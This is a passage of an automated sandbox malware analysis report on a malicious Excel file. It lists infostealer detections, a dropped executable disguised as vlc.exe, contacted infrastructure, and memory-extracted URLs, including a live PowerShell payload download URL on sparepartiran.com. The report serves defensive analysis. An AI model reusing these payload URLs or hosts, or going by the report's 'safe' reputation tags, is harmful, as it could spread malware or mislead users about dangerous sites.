                C:\Users\Public\raqfxwuo.exe24%MetadefenderBrowse
                C:\Users\Public\raqfxwuo.exe55%ReversingLabsByteCode-MSIL.Infostealer.Maslog
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe24%MetadefenderBrowse
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe55%ReversingLabsByteCode-MSIL.Infostealer.Maslog

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                21.2.raqfxwuo.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                20.2.raqfxwuo.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                Domains

                SourceDetectionScannerLabelLink
                sparepartiran.com11%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://cdn.entity.0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                https://discord.com/0%URL Reputationsafe
                https://discord.com/0%URL Reputationsafe
                https://discord.com/0%URL Reputationsafe
                https://discord.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                https://api.aadrm.com/0%URL Reputationsafe
                http://sparepartiran.com/js/2Q/J0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/10%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/vno;0%Avira URL Cloudsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                http://www.zhongyicts.com.cn0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                https://officeci.azurewebsites.net/api/0%VirustotalBrowse
                https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
                http://www.sajatypeworks.com1~0%Avira URL Cloudsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                https://store.office.cn/addinstemplate0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://wus2-000.pagecontentsync.0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://sparepartiran.com/js/2Q/Jqeofcirr6.exe0ym0%Avira URL Cloudsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                https://www.odwebp.svc.ms0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.carterandcone.coml0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/y0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/x0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/x0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/x0%URL Reputationsafe
                https://discord.com/40%Avira URL Cloudsafe
                http://sparepartiran.c0%Avira URL Cloudsafe
                https://discord.com/80%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/k0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/k0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/k0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/b0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/b0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/b0%URL Reputationsafe
                http://sparepartiran.comx0%Avira URL Cloudsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                http://sparepartiran.com0%Avira URL Cloudsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://www.typography.netD0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://fontfabrik.com0%URL Reputationsafe
                http://www.carterandcone.com80%Avira URL Cloudsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                http://www.sandoll.co.kr0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                https://skyapi.live.net/Activity/0%URL Reputationsafe
                http://www.fontbureau.comion0%Avira URL Cloudsafe
                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.founder.com.cn/cn0%URL Reputationsafe
                http://www.jiyu-kobo.co.jp/Y0-c0%Avira URL Cloudsafe
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                https://go.microsoft.co0%Avira URL Cloudsafe
                https://wus2-000.contentsync.0%URL Reputationsafe
                https://wus2-000.contentsync.0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                sparepartiran.com
                162.223.88.131
                truetrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://shell.suite.office.com:14437693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                  high
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                    high
                    https://cdn.entity.7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                      high
                      https://rpsticket.partnerservices.getmicrosoftkey.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://discord.com/vlc.exe.18.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v17693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                        high
                        http://www.fontbureau.com/designersraqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000003.863715280.00000000058DC000.00000004.00000001.sdmpfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                            high
                            https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                              high
                              https://api.aadrm.com/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://sparepartiran.com/js/2Q/Jpowershell.exe, 0000000F.00000002.867208662.000001DF813D9000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/1raqfxwuo.exe, 00000013.00000003.863994938.00000000058DC000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/vno;raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                high
                                https://api.microsoftstream.com/api/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                  high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                    high
                                    https://cr.office.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.858258052.000001FCBE901000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.874182432.000001DF90661000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.galapagosdesign.com/DPleaseraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/(raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.zhongyicts.com.cnraqfxwuo.exe, 00000012.00000002.902397165.00000000062E0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000E.00000002.855256796.000001FCBE6F1000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.858931595.000001DF80601000.00000004.00000001.sdmpfalse
                                          high
                                          https://res.getmicrosoftkey.com/api/redemptionevents7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          https://tasks.office.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                            high
                                            https://officeci.azurewebsites.net/api/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.sajatypeworks.com1~raqfxwuo.exe, 00000013.00000003.857389194.00000000058EB000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            https://store.office.cn/addinstemplate7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.860086707.000001DF80811000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://wus2-000.pagecontentsync.7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.860086707.000001DF80811000.00000004.00000001.sdmpfalse
                                              high
                                              https://contoso.com/Iconpowershell.exe, 0000000F.00000002.874182432.000001DF90661000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                high
                                                http://sparepartiran.com/js/2Q/Jqeofcirr6.exe0ympowershell.exe, 0000000E.00000002.858258052.000001FCBE901000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.860086707.000001DF80811000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.odwebp.svc.ms7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://api.powerbi.com/v1.0/myorg/groups7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                  high
                                                  https://web.microsoftstream.com/video/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                    high
                                                    https://graph.windows.net7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                      high
                                                      https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.860086707.000001DF80811000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.carterandcone.comlraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/yraqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/xraqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://discord.com/4powershell.exe, 0000000E.00000002.860161665.000001FCBEC42000.00000004.00000001.sdmp, raqfxwuo.exe, 00000012.00000000.849362864.0000000000E42000.00000002.00020000.sdmp, raqfxwuo.exe, 00000013.00000000.851665329.0000000000422000.00000002.00020000.sdmp, raqfxwuo.exe, 00000014.00000002.924444029.00000000008A2000.00000002.00020000.sdmp, raqfxwuo.exe, 00000015.00000000.890163942.0000000000A92000.00000002.00020000.sdmp, vlc.exe, 00000017.00000000.903337916.0000000000B82000.00000002.00020000.sdmp, vlc.exe, 00000019.00000000.920919019.0000000000392000.00000002.00020000.sdmp, vlc.exe.18.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://sparepartiran.cpowershell.exe, 0000000E.00000002.860161665.000001FCBEC42000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://discord.com/8powershell.exe, 0000000E.00000002.860161665.000001FCBEC42000.00000004.00000001.sdmp, raqfxwuo.exe, 00000012.00000000.849362864.0000000000E42000.00000002.00020000.sdmp, raqfxwuo.exe, 00000013.00000000.851665329.0000000000422000.00000002.00020000.sdmp, raqfxwuo.exe, 00000014.00000002.924444029.00000000008A2000.00000002.00020000.sdmp, raqfxwuo.exe, 00000015.00000000.890163942.0000000000A92000.00000002.00020000.sdmp, vlc.exe, 00000017.00000000.903337916.0000000000B82000.00000002.00020000.sdmp, vlc.exe, 00000019.00000000.920919019.0000000000392000.00000002.00020000.sdmp, vlc.exe.18.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                          high
                                                          http://www.jiyu-kobo.co.jp/kraqfxwuo.exe, 00000013.00000003.860850803.00000000058D5000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                            high
                                                            http://weather.service.msn.com/data.aspx7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                              high
                                                              http://www.jiyu-kobo.co.jp/braqfxwuo.exe, 00000013.00000003.862193481.00000000058D5000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                high
                                                                http://sparepartiran.comxpowershell.exe, 0000000E.00000002.860043403.000001FCBEC23000.00000004.00000001.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                  high
                                                                  http://www.founder.com.cn/cn/bTheraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://clients.config.office.net/user/v1.0/ios7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                    high
                                                                    https://o365auditrealtimeingestion.manage.office.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                      high
                                                                      https://outlook.office365.com/api/v1.0/me/Activities7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                        high
                                                                        https://clients.config.office.net/user/v1.0/android/policies7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                          high
                                                                          https://entitlement.diagnostics.office.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                            high
                                                                            http://sparepartiran.compowershell.exe, 0000000E.00000002.860043403.000001FCBEC23000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.865375940.000001DF81186000.00000004.00000001.sdmptrue
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                              high
                                                                              http://www.fontbureau.com/designers/cabarga.html)raqfxwuo.exe, 00000013.00000003.863994938.00000000058DC000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://storage.live.com/clientlogs/uploadlocation7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                  high
                                                                                  http://www.typography.netDraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://fontfabrik.comraqfxwuo.exe, 00000012.00000002.902397165.00000000062E0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.carterandcone.com8raqfxwuo.exe, 00000013.00000003.860145524.00000000058E7000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.fonts.comraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.sandoll.co.krraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://graph.windows.net/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                      high
                                                                                      https://devnull.onenote.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                        high
                                                                                        https://messaging.office.com/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                          high
                                                                                          http://www.fontbureau.com/designers/cabarga.htmlmraqfxwuo.exe, 00000013.00000003.863921533.00000000058DC000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                              high
                                                                                              https://skyapi.live.net/Activity/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                high
                                                                                                https://onedrive.live.com/embed?7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                  high
                                                                                                  https://augloop.office.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                    high
                                                                                                    http://www.fontbureau.comionraqfxwuo.exe, 00000012.00000002.897433239.0000000001A17000.00000004.00000040.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.jiyu-kobo.co.jp/jp/raqfxwuo.exe, 00000013.00000003.861559363.00000000058D8000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://api.diagnostics.office.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                      high
                                                                                                      http://www.fontbureau.com/designers/cabarga.htmlNraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.founder.com.cn/cnraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://store.office.de/addinstemplate7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                          high
                                                                                                          https://api.powerbi.com/v1.0/myorg/datasets7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                            high
                                                                                                            http://www.jiyu-kobo.co.jp/Y0-craqfxwuo.exe, 00000013.00000003.862193481.00000000058D5000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://api.diagnosticssdf.office.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                              high
                                                                                                              http://127.0.0.1:HTTP/1.1raqfxwuo.exe, 00000014.00000002.926985798.0000000002D71000.00000004.00000001.sdmp, raqfxwuo.exe, 00000015.00000002.926541973.0000000002EB1000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              https://login.microsoftonline.com/7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                high
                                                                                                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                  high
                                                                                                                  https://go.microsoft.copowershell.exe, 0000000F.00000003.852668699.000001DF986A3000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://api.addins.omex.office.net/appinfo/query7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                    high
                                                                                                                    https://wus2-000.contentsync.7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://clients.config.office.net/user/v1.0/tenantassociationkey7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                      high
                                                                                                                      https://powerlift.acompli.net7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://cortana.ai7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                        high
                                                                                                                        http://www.munchfonts.coraqfxwuo.exe, 00000013.00000003.858263125.00000000058EB000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://cloudfiles.onenote.com/upload.aspx7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                          high
                                                                                                                          https://entitlement.diagnosticssdf.office.com7693F8CE-927A-4BC0-84CE-1390C3757E21.0.drfalse
                                                                                                                            high
                                                                                                                            http://www.sajatypeworks.comraqfxwuo.exe, 00000012.00000002.905518077.0000000007402000.00000004.00000001.sdmp, raqfxwuo.exe, 00000013.00000002.903427260.00000000059C0000.00000002.00000001.sdmp, raqfxwuo.exe, 00000013.00000003.857744123.00000000058EB000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown

                                                                                                                            Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            162.223.88.131
                                                                                                                            unknownUnited States
                                                                                                                            19084COLOUPUStrue

                                                                                                                            Private

                                                                                                                            IP
                                                                                                                            192.168.2.1

                                                                                                                            General Information

                                                                                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                            Analysis ID:324135
                                                                                                                            Start date:28.11.2020
                                                                                                                            Start time:12:16:40
                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                            Overall analysis duration:0h 12m 24s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:light
                                                                                                                            Sample file name:TcLt4.xls
                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                            Number of analysed new started processes analysed:26
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • HDC enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.evad.winXLS@17/13@2/2
                                                                                                                            EGA Information:Failed
                                                                                                                            HDC Information:
                                                                                                                            • Successful, ratio: 0% (good quality ratio 0%)
                                                                                                                            • Quality average: 82%
                                                                                                                            • Quality standard deviation: 11%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 97%
                                                                                                                            • Number of executed functions: 0
                                                                                                                            • Number of non-executed functions: 0
                                                                                                                            Cookbook Comments:
                                                                                                                            • Adjust boot time
                                                                                                                            • Enable AMSI
                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                            • Attach to Office via COM
                                                                                                                            • Scroll down
                                                                                                                            • Close Viewer
                                                                                                                            Warnings:
                                                                                                                            Show All
                                                                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                            • TCP Packets have been reduced to 100
